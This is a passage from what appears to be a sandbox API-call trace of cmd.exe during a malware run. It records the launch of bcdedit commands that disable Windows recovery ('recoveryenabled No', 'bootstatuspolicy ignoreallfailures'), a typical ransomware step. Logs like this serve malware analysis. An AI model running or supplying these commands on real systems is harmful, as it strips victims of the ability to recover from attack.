(_FileHandle=5) returned 0 [0046.268] _dup (_FileHandle=0) returned 4 [0046.269] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0046.280] _close (_FileHandle=3) returned 0 [0046.280] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.280] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.280] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.280] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.280] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.280] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.280] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.280] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.280] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.280] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.280] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.280] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.280] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.280] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.280] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.281] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.281] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.281] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.281] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.281] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.281] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.281] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.281] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.281] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.281] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.281] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.281] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.281] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.281] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.281] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.281] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.281] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.281] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.281] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.281] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.281] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.281] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.281] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.281] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.281] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.281] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.281] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.281] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.281] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.281] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.281] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.281] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.281] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.281] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.282] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.282] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.282] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.282] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.282] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.282] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.282] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.282] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.282] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.282] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.282] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.282] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.282] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.282] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.282] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.282] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.282] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.282] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.282] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.282] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.282] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.282] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.282] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.282] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.282] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.282] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.282] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.282] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.282] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.282] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0046.282] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0046.282] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0046.283] GetProcessHeap () returned 0x440000 [0046.283] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4010) returned 0x461eb0 [0046.283] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0046.283] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0046.283] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0046.283] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0046.283] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0046.283] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0046.283] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0046.283] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0046.283] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0046.283] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0046.283] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0046.283] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned -14 [0046.283] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0046.283] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0046.283] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0046.283] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0046.283] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0046.283] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0046.283] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0046.283] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0046.283] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0046.283] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0046.283] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0046.283] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0046.283] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0046.283] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0046.283] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0046.284] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0046.284] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0046.284] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0046.284] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0046.284] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0046.284] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0046.284] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0046.284] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0046.284] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0046.284] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0046.284] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0046.284] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0046.284] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 [0046.284] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0046.284] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0046.284] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0046.284] GetProcessHeap () returned 0x440000 [0046.284] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x420) returned 0x45c470 [0046.284] SetErrorMode (uMode=0x0) returned 0x0 [0046.284] SetErrorMode (uMode=0x1) returned 0x0 [0046.284] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45c480, lpFilePart=0x26f6f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f6f0*="Desktop") returned 0x25 [0046.284] SetErrorMode (uMode=0x0) returned 0x1 [0046.284] GetProcessHeap () returned 0x440000 [0046.284] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x45c470, Size=0x6c) returned 0x45c470 [0046.284] GetProcessHeap () returned 0x440000 [0046.284] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x45c470) returned 0x6c [0046.284] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.285] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.285] GetProcessHeap () returned 0x440000 [0046.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x128) returned 0x455c50 [0046.285] GetProcessHeap () returned 0x440000 [0046.285] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x240) returned 0x45c4f0 [0046.286] GetProcessHeap () returned 0x440000 [0046.286] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x45c4f0, Size=0x12a) returned 0x45c4f0 [0046.286] GetProcessHeap () returned 0x440000 [0046.286] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x45c4f0) returned 0x12a [0046.286] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.286] GetProcessHeap () returned 0x440000 [0046.286] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe8) returned 0x441cf0 [0046.286] GetProcessHeap () returned 0x440000 [0046.286] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x441cf0, Size=0x7e) returned 0x441cf0 [0046.286] GetProcessHeap () returned 0x440000 [0046.287] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x441cf0) returned 0x7e [0046.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.287] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f460) returned 0xffffffffffffffff [0046.287] GetLastError () returned 0x2 [0046.287] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x26f460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f460) returned 0xffffffffffffffff [0046.287] GetLastError () returned 0x2 [0046.287] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.287] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f460) returned 0x45a000 [0046.287] GetProcessHeap () returned 0x440000 [0046.287] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x454730, Size=0x8) returned 0x4589e0 [0046.287] FindClose (in: hFindFile=0x45a000 | out: hFindFile=0x45a000) returned 1 [0046.287] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x26f460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f460) returned 0xffffffffffffffff [0046.287] GetLastError () returned 0x2 [0046.288] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f460, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f460) returned 0x45a000 [0046.288] FindClose (in: hFindFile=0x45a000 | out: hFindFile=0x45a000) returned 1 [0046.288] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.288] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x28) returned 0x454730 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x218) returned 0x45c630 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x66) returned 0x441d80 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x420) returned 0x45c850 [0046.288] SetErrorMode (uMode=0x0) returned 0x0 [0046.288] SetErrorMode (uMode=0x1) returned 0x0 [0046.288] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45c860, lpFilePart=0x26f480 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x26f480*="Desktop") returned 0x25 [0046.288] SetErrorMode (uMode=0x0) returned 0x1 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x45c850, Size=0x6c) returned 0x45c850 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x45c850) returned 0x6c [0046.288] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.288] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x128) returned 0x45c8d0 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x240) returned 0x45ca00 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x45ca00, Size=0x12a) returned 0x45ca00 [0046.288] GetProcessHeap () returned 0x440000 [0046.288] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x45ca00) returned 0x12a [0046.289] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.289] GetProcessHeap () returned 0x440000 [0046.289] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xe8) returned 0x45cb40 [0046.289] GetProcessHeap () returned 0x440000 [0046.289] RtlReAllocateHeap (Heap=0x440000, Flags=0x0, Ptr=0x45cb40, Size=0x7e) returned 0x45cb40 [0046.289] GetProcessHeap () returned 0x440000 [0046.289] RtlSizeHeap (HeapHandle=0x440000, Flags=0x0, MemoryPointer=0x45cb40) returned 0x7e [0046.289] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.289] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0xffffffffffffffff [0046.289] GetLastError () returned 0x2 [0046.289] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0xffffffffffffffff [0046.289] GetLastError () returned 0x2 [0046.289] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.289] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0x45a000 [0046.289] FindClose (in: hFindFile=0x45a000 | out: hFindFile=0x45a000) returned 1 [0046.289] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0xffffffffffffffff [0046.290] GetLastError () returned 0x2 [0046.290] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x26f1f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f1f0) returned 0x45a000 [0046.290] FindClose (in: hFindFile=0x45a000 | out: hFindFile=0x45a000) returned 1 [0046.290] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0046.290] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0046.290] GetConsoleTitleW (in: lpConsoleTitle=0x26f740, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.402] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f4f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f4b8 | out: lpAttributeList=0x26f4f8, lpSize=0x26f4b8) returned 1 [0046.402] UpdateProcThreadAttribute (in: lpAttributeList=0x26f4f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f4a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f4f8, lpPreviousValue=0x0) returned 1 [0046.402] GetStartupInfoW (in: lpStartupInfo=0x26f610 | out: lpStartupInfo=0x26f610*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.402] GetProcessHeap () returned 0x440000 [0046.402] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x20) returned 0x4413e0 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.402] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.403] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.403] GetProcessHeap () returned 0x440000 [0046.403] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4413e0 | out: hHeap=0x440000) returned 1 [0046.403] GetProcessHeap () returned 0x440000 [0046.403] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x12) returned 0x455d80 [0046.403] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.403] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f530*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} recoveryenabled No", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f4e0 | out: lpCommandLine="bcdedit /set {default} recoveryenabled No", lpProcessInformation=0x26f4e0*(hProcess=0x58, hThread=0x54, dwProcessId=0x758, dwThreadId=0x700)) returned 1 [0046.408] CloseHandle (hObject=0x54) returned 1 [0046.408] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.408] GetProcessHeap () returned 0x440000 [0046.408] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x45b980 | out: hHeap=0x440000) returned 1 [0046.408] GetEnvironmentStringsW () returned 0x45ae90* [0046.408] GetProcessHeap () returned 0x440000 [0046.408] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xae8) returned 0x45b980 [0046.408] FreeEnvironmentStringsW (penv=0x45ae90) returned 1 [0046.408] GetProcessHeap () returned 0x440000 [0046.408] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x455d80 | out: hHeap=0x440000) returned 1 [0046.408] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f4f8 | out: lpAttributeList=0x26f4f8) [0046.408] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0046.409] _close (_FileHandle=4) returned 0 [0046.409] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0046.602] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x26fa18 | out: lpExitCode=0x26fa18*=0x0) returned 1 [0046.603] CloseHandle (hObject=0x60) returned 1 [0046.603] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0047.460] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x26fa18 | out: lpExitCode=0x26fa18*=0x0) returned 1 [0047.460] CloseHandle (hObject=0x58) returned 1 [0047.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.460] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0047.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0047.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0047.461] _get_osfhandle (_FileHandle=0) returned 0x3 [0047.461] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0047.461] SetConsoleInputExeNameW () returned 0x1 [0047.461] GetConsoleOutputCP () returned 0x1b5 [0047.461] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0047.461] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0047.461] exit (_Code=0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1de8b000" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\system32\\cmd.exe /C title 6037086|bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" 